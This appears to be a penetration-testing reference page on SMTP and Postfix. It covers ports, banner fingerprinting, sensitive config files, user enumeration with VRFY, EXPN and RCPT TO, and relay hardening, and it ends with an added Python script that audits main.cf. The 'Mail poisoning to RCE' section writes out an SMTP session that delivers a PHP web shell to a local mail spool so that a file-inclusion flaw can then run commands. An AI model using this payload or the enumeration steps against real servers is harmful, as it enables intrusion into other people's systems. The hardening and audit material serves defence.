Postfix / SMTP
aka SMTP, Sendmail, Exim
Mail transfer agent on 25/465/587. VRFY, EXPN and RCPT TO replies enumerate valid local users, and a spool that anyone can write to simply by sending mail (/var/mail/<user>) combined with an LFI in a web app that can read that spool is the classic mail-poisoning path to RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 25 | tcp | SMTP, server-to-server relay, typically no AUTH |
| 465 | tcp | SMTPS, implicit TLS |
| 587 | tcp | submission, STARTTLS plus AUTH for mail clients |
Fingerprint
- 220 banner naming Postfix/Sendmail/Exim
- EHLO reply lists the supported extensions (AUTH, STARTTLS, VRFY); Postfix does not implement EXPN at all, Sendmail and Exim do unless it is disabled
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /var/mail/<user> | user mail spool, the LFI include/poisoning target; normally mode 0600, owner <user>, group mail | |
| /var/spool/mail/<user> | alternate spool location, on many distros a symlink to /var/mail | |
| /etc/postfix/main.cf | MTA config (mynetworks, relay restrictions, disable_vrfy_command) | |
| /etc/postfix/sasl_passwd | relay credentials when configured (plus the compiled .db) | sensitive |
| /etc/aliases | mail aliases; an alias can map an address to a program via "|/path/to/command" | |
Service users
postfix
Exploitation primitives
- VRFY / EXPN / RCPT TO user enumeration (smtp-user-enum)
- Mail poisoning: send PHP to a local user, then include /var/mail/<user> (or /var/spool/mail/<user>) through an LFI for RCE; only works if the web server's user can read that spool
- Open relay abuse (spam, phishing from the victim's domain) when mynetworks or the relay restrictions are too broad
Overview
SMTP services move mail on 25 (and 465/587). For an attacker they offer two things: username enumeration through VRFY/EXPN/RCPT TO, and a mail spool that any sender can write into, which pairs with an LFI to reach code execution.
Enumeration
Grab the 220 banner, then EHLO to list the extensions the server supports (AUTH, STARTTLS, VRFY):
nc -nv <TARGET> 25
EHLO test
Enumerate users with VRFY; if the server answers 502 (VRFY disabled), switch to -M RCPT, because RCPT TO must be answered for mail to be deliverable at all:
smtp-user-enum -M VRFY -U users.txt -t <TARGET> -p 25
Mail poisoning to RCE
HELO x
MAIL FROM:<attacker@attacker.local>
RCPT TO:<localuser>
DATA
<?php system($_GET['cmd']); ?>
.
Then include /var/mail/<localuser> (or /var/spool/mail/<localuser>) via the LFI and pass the command in the cmd parameter. This needs a recipient whose spool the web server can read: spools are normally 0600 owner:mail, so in practice the target is the account the web server runs as (for example www-data) if it accepts local mail, or a spool with loosened permissions. The LFI must also not append a fixed suffix to the included path.
Hardening
Disable VRFY (Postfix: disable_vrfy_command = yes; Sendmail: PrivacyOptions=goaway, which also disables EXPN; Exim rejects VRFY and EXPN unless an ACL explicitly allows them), offer AUTH only over TLS on 587/465, and make unauthenticated relaying impossible: keep mynetworks to loopback and known hosts, and have smtpd_relay_restrictions end in permit_sasl_authenticated followed by reject_unauth_destination (or defer_unauth_destination) with no bare permit before it.
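A check for the misconfigurations this section names, as an added Python example that is not from the page: it parses postconf-style main.cf text and flags VRFY left enabled, a mynetworks entry that trusts the whole Internet, and relay restrictions that never reject unauthorized destinations. The two embedded configs are constructed; the parameter names, the "no" default for disable_vrfy_command and the Postfix 2.10+ default for smtpd_relay_restrictions are Postfix's own.

```python
# Added example, not from the original page: audit Postfix main.cf text for the
# weaknesses this section lists. Both configs below are constructed; parameter
# names and defaults are Postfix's own (postconf(5)).
import ipaddress
import re

WEAK_MAIN_CF = """\
myhostname = mail.example.test
mynetworks = 0.0.0.0/0
disable_vrfy_command = no
smtpd_relay_restrictions = permit_mynetworks, permit
"""

HARDENED_MAIN_CF = """\
myhostname = mail.example.test
mynetworks = 127.0.0.0/8, [::1]/128
disable_vrfy_command = yes
smtpd_relay_restrictions = permit_mynetworks,
    permit_sasl_authenticated,
    reject_unauth_destination
"""

# Postfix >= 2.10 default used when smtpd_relay_restrictions is absent from main.cf
RELAY_DEFAULT = "permit_mynetworks, permit_sasl_authenticated, defer_unauth_destination"
RELAY_GUARDS = ("reject_unauth_destination", "defer_unauth_destination")


def parse_main_cf(text):
    """Parse 'name = value' lines; indented lines continue the previous value."""
    params, current = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            params[current] += " " + raw.strip()
            continue
        name, _, value = raw.partition("=")
        current = name.strip()
        params[current] = value.strip()
    return params


def audit_main_cf(text):
    """Return findings for: VRFY enabled, world-trusting mynetworks, open relay."""
    p, findings = parse_main_cf(text), []
    if p.get("disable_vrfy_command", "no") != "yes":        # Postfix default is "no"
        findings.append("VRFY enabled, set disable_vrfy_command = yes")
    for entry in re.split(r"[,\s]+", p.get("mynetworks", "")):
        try:
            # "[::1]/128" is Postfix's IPv6 syntax; ipaddress wants "::1/128"
            net = ipaddress.ip_network(entry.replace("[", "").replace("]", ""), strict=False)
        except ValueError:
            continue                                         # hostnames, tables: not checked
        if net.prefixlen == 0:
            findings.append("mynetworks trusts %s, so anyone may relay" % entry)
    tokens = [t for t in re.split(r"[,\s]+", p.get("smtpd_relay_restrictions", RELAY_DEFAULT)) if t]
    guard = next((i for i, t in enumerate(tokens) if t in RELAY_GUARDS), None)
    if guard is None or "permit" in tokens[:guard]:          # no guard, or bare permit first
        findings.append("smtpd_relay_restrictions never rejects unauthorized destinations (open relay)")
    return findings
```

audit_main_cf(WEAK_MAIN_CF) reports all three problems and audit_main_cf(HARDENED_MAIN_CF) reports none. Run it over the output of postconf -n rather than the raw file when you want the values Postfix actually applies, since main.cf may omit parameters that postconf fills with defaults.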